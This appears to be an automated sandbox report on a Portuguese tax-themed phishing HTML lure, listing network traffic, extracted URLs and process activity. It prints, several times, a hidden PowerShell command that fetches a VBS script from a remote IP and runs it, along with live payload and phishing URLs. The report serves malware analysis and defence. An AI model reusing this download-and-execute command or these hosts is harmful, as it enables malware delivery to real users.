ZSTYWJGHJRLDU2SIM9F3JVVVL2B9IVZ7PMSI8VA6VB6EB98QYVDCY8AB78Q5HG8Y3NKIMIL09JIIKRTL3ZLKRVIRMQM9FEKPDGMKL0DRLODQY2ORQEBV5JJIDI767LX4X3ESF49DU3PDS30TC4VADDU37CVC2GU91J46W5MXE8BC5F1LTP4C0X1SLLVDJ7LNJQMI945GU95ECS81LLVPNSIGSNXOMIMHKY2R3UMWUWT0YZQ3N229O591GF0ZIT5MKKQOKS71864Y8SS572AUQM32YALK2KQB1HCAHBE44BARAJ3KK5KQSN5N4ZWKHJ8JR371QRW5KFKOLO1QHX97AAUQM0FVPQWVC19HNBJIH30MWTBS5ISXLBJRJTQKMDSITELUOVDFN1YHJI23KWYG8CLBSU74XV6DMT3UHSELEMIUMCHB0Z9WPMJR4JC4WJU14Z50QIZGUPBW310PM6E9VJKAINK7QJZ51RKYGRXAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /moIMNba HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: ld-1803-p.s3.us-east-2.amazonaws.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /gEkBKUi HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: ld-2403-p.s3.us-east-2.amazonaws.com
Source: global traffic	HTTP traffic detected: GET /349.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 3.133.160.140Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /498.php HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 3.128.172.139

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: autoridade-tributaria.com
Source: global traffic	DNS traffic detected: DNS query: ld-1803-p.s3.us-east-2.amazonaws.com
Source: global traffic	DNS traffic detected: DNS query: ld-2403-p.s3.us-east-2.amazonaws.com

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 24 Mar 2025 16:30:28 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Thu, 29 Sep 2022 22:59:26 GMTAccept-Ranges: bytesContent-Length: 22122Vary: Accept-EncodingContent-Type: text/html
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 24 Mar 2025 16:30:28 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Thu, 29 Sep 2022 22:59:26 GMTAccept-Ranges: bytesContent-Length: 22122Vary: Accept-EncodingContent-Type: text/html
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 24 Mar 2025 16:30:28 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Thu, 29 Sep 2022 22:59:26 GMTAccept-Ranges: bytesContent-Length: 22122Vary: Accept-EncodingContent-Type: text/html
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 24 Mar 2025 16:30:28 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Thu, 29 Sep 2022 22:59:26 GMTAccept-Ranges: bytesContent-Length: 22122Vary: Accept-EncodingContent-Type: text/html
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 24 Mar 2025 16:30:28 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Thu, 29 Sep 2022 22:59:26 GMTAccept-Ranges: bytesContent-Length: 22122Vary: Accept-EncodingContent-Type: text/html
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 24 Mar 2025 16:30:28 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Thu, 29 Sep 2022 22:59:26 GMTAccept-Ranges: bytesContent-Length: 22122Vary: Accept-EncodingContent-Type: text/html
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 24 Mar 2025 16:30:28 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Thu, 29 Sep 2022 22:59:26 GMTAccept-Ranges: bytesContent-Length: 22122Vary: Accept-EncodingContent-Type: text/html
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 24 Mar 2025 16:30:29 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Thu, 29 Sep 2022 22:59:26 GMTAccept-Ranges: bytesContent-Length: 22122Vary: Accept-EncodingContent-Type: text/html
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 24 Mar 2025 16:30:29 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Thu, 29 Sep 2022 22:59:26 GMTAccept-Ranges: bytesContent-Length: 22122Vary: Accept-EncodingContent-Type: text/html
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Mar 2025 16:30:30 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Thu, 29 Sep 2022 22:59:30 GMTAccept-Ranges: bytesContent-Length: 2361Vary: Accept-EncodingContent-Type: text/html

Source: wscript.exe, 00000015.00000002.2821847478.000001EBB3FC3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000015.00000002.2821625744.000001EBB2395000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000015.00000003.2647275712.000001EBB3F8C000.00000004.00000020.00020000.00000000.sdmp, 9772.vbs.11.dr	String found in binary or memory: http://3.128.172.139/498.php
Source: wscript.exe, 00000015.00000002.2820821373.000001EBB20E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://3.128.172.139/498.php9FD1
Source: wscript.exe, 00000015.00000002.2820821373.000001EBB20E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://3.128.172.139/498.phpbk
Source: wscript.exe, 00000015.00000003.2647713434.000001EBB3F75000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://3.128.172.139/498.phpfqVhyFlYQh
Source: wscript.exe, 0000000B.00000002.2820518427.0000000003628000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://3.128.172.139/498.phpk
Source: wscript.exe, 00000015.00000002.2820821373.000001EBB21DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://3.128.172.139/498.phpl
Source: wscript.exe, 00000015.00000002.2820821373.000001EBB20E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://3.128.172.139:80/498.php
Source: powershell.exe, 00000009.00000002.1249559562.0000000004AA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://3.133.160
Source: powershell.exe, 00000009.00000002.1249559562.0000000004817000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://3.133.160.140
Source: powershell.exe, 00000009.00000002.1249559562.00000000046C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1261960182.00000000081D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://3.133.160.140/349.php
Source: powershell.exe, 00000009.00000002.1247434908.0000000002785000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro3KW
Source: powershell.exe, 00000009.00000002.1247434908.00000000026FC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1261725593.0000000008142000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1262100340.0000000008204000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: svchost.exe, 0000000A.00000002.2824248597.0000022923000000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: svchost.exe, 0000000A.00000002.2824876069.00000229230E2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/
Source: qmgr.db.10.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.10.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.10.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.10.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 0000000A.00000002.2825435446.0000022923126000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.2824248597.0000022923000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.2824820610.00000229230CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1471103377.0000022922E82000.00000004.00000800.00020000.00000000.sdmp, edb.log.10.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adnnf2xkczyschn5rjlarpymlqwq_2025.3.12.0/
Source: qmgr.db.10.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.10.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: svchost.exe, 0000000A.00000002.2824612400.0000022923062000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com:80fs/windows/config.json
Source: qmgr.db.10.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000009.00000002.1249559562.0000000004BC4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://go.micros
Source: powershell.exe, 00000009.00000002.1255125680.000000000571A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000009.00000002.1249559562.0000000004817000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000009.00000002.1249559562.000000000492F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000009.00000002.1249559562.00000000046C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000009.00000002.1249559562.000000000492F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000009.00000002.1249559562.0000000004817000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000009.00000002.1249559562.00000000046C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB?r
Source: powershell.exe, 00000009.00000002.1249559562.000000000492F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: COMPROVATIVO-14996813-MAR#U00c7O-ANCZ0-PD9BC - 208.html	String found in binary or memory: https://autoridade-tributaria.com/MAR-FAT/Comprovativo_Marco_uGGehnlzuhp_17-03-2025_207.php?=5QIANUH
Source: powershell.exe, 00000009.00000002.1255125680.000000000571A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000009.00000002.1255125680.000000000571A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000009.00000002.1255125680.000000000571A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: edb.log.10.dr, qmgr.db.10.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
Source: svchost.exe, 0000000A.00000003.1204336475.0000022922E80000.00000004.00000800.00020000.00000000.sdmp, edb.log.10.dr, qmgr.db.10.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2/C:
Source: powershell.exe, 00000009.00000002.1249559562.0000000004817000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000009.00000002.1249559562.00000000048EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ld-1803-p.s3.us-east-2.amazonaws.com
Source: powershell.exe, 00000009.00000002.1249559562.0000000004A3A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1249559562.00000000048EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ld-1803-p.s3.us-east-2.amazonaws.com/moIMNba
Source: wscript.exe, 00000015.00000002.2820821373.000001EBB21B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ld-2403-p.s3.us-east-2.amazonaws.com/
Source: wscript.exe, 00000015.00000002.2820821373.000001EBB20E8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000015.00000002.2820821373.000001EBB21B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000015.00000002.2822165448.000001EBB40DC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ld-2403-p.s3.us-east-2.amazonaws.com/gEkBKUi
Source: wscript.exe, 00000015.00000002.2822165448.000001EBB40DC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ld-2403-p.s3.us-east-2.amazonaws.com:443/gEkBKUi
Source: powershell.exe, 00000009.00000002.1255125680.000000000571A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: chromecache_66.1.dr	String found in binary or memory: https://www.hostgator.com.br

Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49695 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49676 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49681
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49690 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49695
Source: unknown	Network traffic detected: HTTP traffic on port 49694 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49694
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49690
Source: unknown	Network traffic detected: HTTP traffic on port 49671 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49681 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701

Source: unknown	HTTPS traffic detected: 142.251.41.4:443 -> 192.168.2.8:49690 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.241.60.162:443 -> 192.168.2.8:49694 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.241.60.162:443 -> 192.168.2.8:49695 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.241.60.162:443 -> 192.168.2.8:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.241.60.162:443 -> 192.168.2.8:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.241.60.162:443 -> 192.168.2.8:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.241.60.162:443 -> 192.168.2.8:49703 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.241.60.162:443 -> 192.168.2.8:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.241.60.162:443 -> 192.168.2.8:49701 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.241.60.162:443 -> 192.168.2.8:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.219.108.138:443 -> 192.168.2.8:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.5.129.15:443 -> 192.168.2.8:49730 version: TLS 1.2

System Summary

Potential malicious VBS script found (suspicious strings)

Source: C:\Windows\SysWOW64\wscript.exe

Dropped file: Set jtEWptXBzRdSjyqvEbRkbQgYRevuIjSxDSYC = CreateObject("WinHttp.WinHttpRequest.5.1")

Jump to dropped file

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}			Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: WinHttpRequest Component version 5.1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2087c2f4-2cef-4953-a8ab-66779b670495}			Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Process Stats: CPU usage > 49%

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\scoped_dir5444_381830083			Jump to behavior
Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp			Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File deleted: C:\Windows\SystemTemp\scoped_dir5444_381830083

Jump to behavior

Source: classification engine

Classification label: mal100.phis.expl.evad.winHTML@31/17@6/10

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6396:120:WilError_03

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bsejgeqh.fjo.ps1

Jump to behavior

Source: unknown

Process created: C:\Windows\SysWOW64\cmd.exe cmd /K powershell -windowstyle hidden -Command "$u='http://3.133.160.140/349.php'; $t=$env:temp + '\5049.vbs'; Invoke-WebRequest -Uri $u -OutFile $t; if (Test-Path $t) { Start-Process $t }" -NoNewWindow #Habilitar Visualiza o de ficheiro DOCx

Source: C:\Windows\SysWOW64\cmd.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1856,i,12380028377297029268,5033635301295998014,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2136 /prefetch:3
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\COMPROVATIVO-14996813-MAR#U00c7O-ANCZ0-PD9BC - 208.html"
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe cmd /K powershell -windowstyle hidden -Command "$u='http://3.133.160.140/349.php'; $t=$env:temp + '\5049.vbs'; Invoke-WebRequest -Uri $u -OutFile $t; if (Test-Path $t) { Start-Process $t }" -NoNewWindow #Habilitar Visualiza o de ficheiro DOCx
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -Command "$u='http://3.133.160.140/349.php'; $t=$env:temp + '\5049.vbs'; Invoke-WebRequest -Uri $u -OutFile $t; if (Test-Path $t) { Start-Process $t }" -NoNewWindow #Habilitar Visualiza o de ficheiro DOCx
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\5049.vbs"
Source: unknown	Process created: C:\Windows\System32\wscript.exe wscript.exe "C:\Users\user\AppData\Local\Temp\9772.vbs"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1856,i,12380028377297029268,5033635301295998014,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2136 /prefetch:3	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /K powershell -windowstyle hidden -Command "$u='http://3.133.160.140/349.php'; $t=$env:temp + '\5049.vbs'; Invoke-WebRequest -Uri $u -OutFile $t; if (Test-Path $t) { Start-Process $t }" -NoNewWindow #Habilitar Visualiza o de ficheiro DOCx	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -Command "$u='http://3.133.160.140/349.php'; $t=$env:temp + '\5049.vbs'; Invoke-WebRequest -Uri $u -OutFile $t; if (Test-Path $t) { Start-Process $t }" -NoNewWindow #Habilitar Visualiza o de ficheiro DOCx	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\5049.vbs"	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
